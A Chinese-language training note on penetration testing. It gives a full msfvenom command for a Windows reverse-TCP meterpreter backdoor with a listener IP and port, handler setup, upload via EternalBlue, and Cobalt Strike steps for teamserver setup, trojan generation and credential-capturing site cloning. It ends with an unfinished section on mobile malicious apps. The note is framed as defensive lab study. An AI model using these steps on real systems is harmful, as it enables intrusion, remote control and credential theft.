我是dream,我在新课程培训学习网安方面的知识,下面是关于msf恶意程序利用以及CS的内容。
目录
PC端恶意程序利用
制作Windows恶意软件获取shell
后门的生成是为了更好的理解渗透过程中的方法以及途径,进而达到更好的防护,而不是利用技巧去做攻击等不合理的行为
思路就是利用社会工程学中人的心理,去为某系软件利用msf生成一些后门程序,进而通过带有后门的软件实现渗透获取shell
MSF简介
msfvenom是一个Metasploit独立的有效负载生成器,也是msfpayload和msfencode的替代品。是用来生成后门的软件
实验内容:
1、制作Windows恶意软件获取shell;
2、msfvenom的shell在Windows中的使用;
3、msfvenom生成shell.exe
实验步骤
1、切换root模式 sudo su
2、输入命令:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.25.128 LPORT=6060 -f exe > nice.exe
-p 后面的 Windows/meterpreter/reverse_tcp 是在指定生成的有效载荷的类型。
LHOST后面的ip是攻击机的ip (注意攻击机和靶机的ip要在同一个网段上)
LPORT=6060 这里是指定连接的端口,尽量选择大一点的端口
-f 指输出的形式,这里指生成exe这种可执行文件
3、启动 metaspliot msfconsole
4、metaspliot设置侦听
msf > use expliot/multi/handler 加载模块
msf exploit(multi/handler)> set payload windows/meterpreter/reverse_tcp 设置payload
msf expoit(multi/handler) > set lhost kali的ip 设置kali的ip
msf exploit(multi/handler) > exploit 或 run -j 运行
5、将生成的shell上传至Windows主机中并运行
可通过永恒之蓝的漏洞上传
详情请看我的第二篇学习笔记——渗透测试
成功渗透之后,先用screenshot确定存储的路径
至于c:\\用两个,是因为这是转译(系统不同),对方收到后会丢失一个
然后用upload 加上刚才的路径,再加上刚才生成的exe文件,将这个文件传输到靶机的c盘里面。
ps:第一次上传失败是因为我没有在upload后面空格
第二次失败是我的上传路径不对。所以先用screenshot确定路径很必要。
Cobalt Strike
概念
一款以美国redteam团队研发出来的一款以Metasploit为基础的GUI框架式渗透测试工具
它是一款基于Java的渗透测试神器,常被业界人士称为CS,也被戏称为“线上多人运动平台”。
CS为啥被称为“线上多人运动平台”?
CS使用了C/S架构,它分为客户端和服务端,服务端只要一个,客户端可有多个,多人连接服务端后可协同测试,与其他人分享shell
C/S架构,服务器-客户机,即Client-Server(C/S)结构。C/S结构通常采取两层结构、服务器负责数据的管理,客户机负责完成与用户的交互任务。
当然连接别人的shell的前提,是知晓了对方的IP和密码。
Cobalt Strike集成了端口转发、扫描多模式端口Listener、Windows exe程序生成、Windows dll动态链接库生成、Java程序生成、office宏代码生成,包括站点克隆获取浏览器的相关信息等。
01 搭建服务器
1.在kali中解压压缩包并且将压缩包单独放入一个文件
也可以在物理机上关闭防火墙和杀软,解压好了后复制粘贴到kali中。
2.进入CS目录,并且给予相关权限
cd cobalt_strike_4.5 首先进入CS的目录
ls 查看文件
chmod 777 * 使用chmod命令给所有的文件可读可写可执行权限(777表示可读可写可执行)
3.运行CS文件,设置服务器IP,密码
./teamserver kali的ip 连接密码
4.Windows中运行CS的.bat文件
直接关闭防火墙,运行 cobaltstrike.bat这个文件
或者 在CS的目录下输入 ./cobaltstrike
在弹出来的窗口中,别名、主机、端口、用户都可以不修改,密码必须是第三部设置的密码,输入密码之后,点击连接.
会弹出一个“yes”“no”的弹窗,选择“yes”
就会出现下面这个弹窗
02 参数详情
1. Cobalt Strike
New Connection | 新建连接: | 支持连接多个服务器 |
Preferences | 偏好设置: | Cobalt Strike界面、控制台、以及输出报告样式、TeamServer连接记录 |
Visualization | 可视化: | 主要展示输出结果的视图 |
VPN Interfaces | VPN网卡: | 设置VPN |
Listenrs | 监听器: | 创建监听器(很重要) |
Script Manager | 脚本管理器: | 管理拓展的脚本 |
Close | 断开连接 | 字面意思 |
2. 视图
Applications (应用程序) | 显示受害主机的应用信息 | |
Credentials (密码凭证) | 显示所有已获取的受害主机的凭证,如hashdump、Mimikatz | |
Downloads (下载列表) | 查看已下载文件 | |
Event Log (事件日志) | 主机上线记录以及团队协作聊天记录 | |
Keystroke (键盘记录) | 查看键盘记录结果 | |
Proxy Pivots (代理转发) | 查看代理模块 | |
Screenshots (屏幕截图) | 查看所有屏幕截图 | |
Script Console(脚本控制台) | 加载第三方脚本以增强功能 | |
Targets (目标列表) | 显示所有受害主机 | |
Web Log (Web 日志) | 所有web服务的日志 |
3. 攻击
HTML Application(HTA文档) | 生成一个恶意HTML Application木马,后缀格式为.hta。通过HTML调用其他语言的应用组件进行攻击,提供了可执行文件、PowerShell、VBA三种方法 |
MS Office Macro(Office宏) | 生成office宏病毒文件; |
Payload Generator(Payload生成器) | 生成各种语言版本的payload,可以生成基于C、C#、COM Scriptlet、Java、Perl、PowerShell、Python、VBA等的payload |
Windows Executable(Windows可执行程序) | 生成32位或64位的exe和基于服务的exe、DLL等后门程序 |
Windows Executable(S)(Windows可执行程序) | 用于生成一个exe可执行文件,其中包含Beacon的完成payload,不需要阶段性的请求。与Windows Executable模块相比,该模块额外提供了代理设置,以便在较为苛刻的环境中进行渗透测试。该模块还支持powershell脚本,可用于将Stageless Payload注入内存 |
Web Drive-byManage(站点管理) | 对开启的web服务进行管理 |
Clone Site(网站克隆) | 克隆网站,可以记录受害者提交的数据 |
Host File (文件托管) | 提供文件下载,可以选择Mime类型 |
Scripted Web Delivery (Web投递) | 为payload提供web服务以便下载和执行,类似于Metasploit的web_delivery |
Signed Applet Attack (签名Applet攻击) | 启动一个web服务以提供自签名Java Applet的运行环境 |
Smart Applet Attack (智能Applet攻击) | 自动检测Java版本并利用已知的exploit绕过security |
System Profiler (信息收集) | 用于获取系统信息,如系统版本,Flash版本,浏览器版本等 |
4. cs第二行图标的含义
03 CS的简单操作
1. 建立监听器
HTTP地址要填kali的ip地址,名字可以随便取,其他的可以保持不变。
点击保存后,就会显示“监听器已启动”。
2. 做克隆网站
克隆URL:选择要克隆的网址(一定要是http的网站,https不行)
下面的框框要勾选,做一个键盘监听,然后点击克隆。弹出窗口,复制克隆好的网址,再点ok。
然后就会出现一个跟被克隆的网站一样的页面,但是填入账号密码是不能登录的。
但是打开视图-web日志,会看到登录的信息。所以千万不要随意点开陌生链接,不要填写账号密码,不然账号和密码会被别人知道的。
这个操作真的太刑了。。。
2. 生成木马,进行后渗透攻击
选择刚才创建的监听器,再点击生成,就会出现右图,选择保存路径。
如果放到Windows,木马不见了,说明被防火墙杀掉了,记得添加信任区。
将生成的木马文件拖到靶机中,双击木马,CS就会显示上线!
此处可用永恒之蓝将木马上传到靶机中。
只要靶机运行这个文件,那么在CS视图-web日志中,就会显示出对方上线的信息。
右键,选择会话交互(相当于通过永恒之蓝渗透进入了,只不过速度会慢一点);或者回连间隔;抓取明文密码(没成功)等操作
可狱可囚,三思后行。
手机恶意应用程序分析(补充)未完
01 什么是手机恶意应用程序?
手机恶意应用程序:指在用户不完全知情和认可(它包括未经用户许可、强迫引导用户许可或隐瞒关键信息等)的情况下强行安装到用户手机中,或者一旦安装就无法正常卸载和删除,但又具备一定正常功能的软件程序。
它是介于病毒和正常软件之间的软件,它与病毒的区别是:一般还具备一定的正常功能。
根源载体——手机
02 有什么危害?
恶意植入的木马程序可摘用户不知情的情况下,收集用户个人隐私信息、恶意扣费
PS:
1. 不要连接公共WiFi,因为连接好了之后,你和黑客处于同一个网段,黑客就可以攻击你的手机。
2. 去官网下载软件,不然可能下载到捆绑恶意应用程序(就像之前克隆的网站一样,肉眼分辨不出来)。
3. 不要贪小便宜,扫街边的二维码
03 如何产生?
很多APP由于存在大量安全漏洞和缺乏安全措施,被不法分子二次打包后,或被直接仿冒,或植入广告、恶意代码,甚至加入违法内容,重新投放应用市场,严重危害用户隐私与财产安全,网络“黑产”链条也开始滋生。
apk木马
名字可以随意取
1. 访问链接下载恶意应用(用短连接伪装,看不出来是木马)
2. 扫描二维码下载恶意应用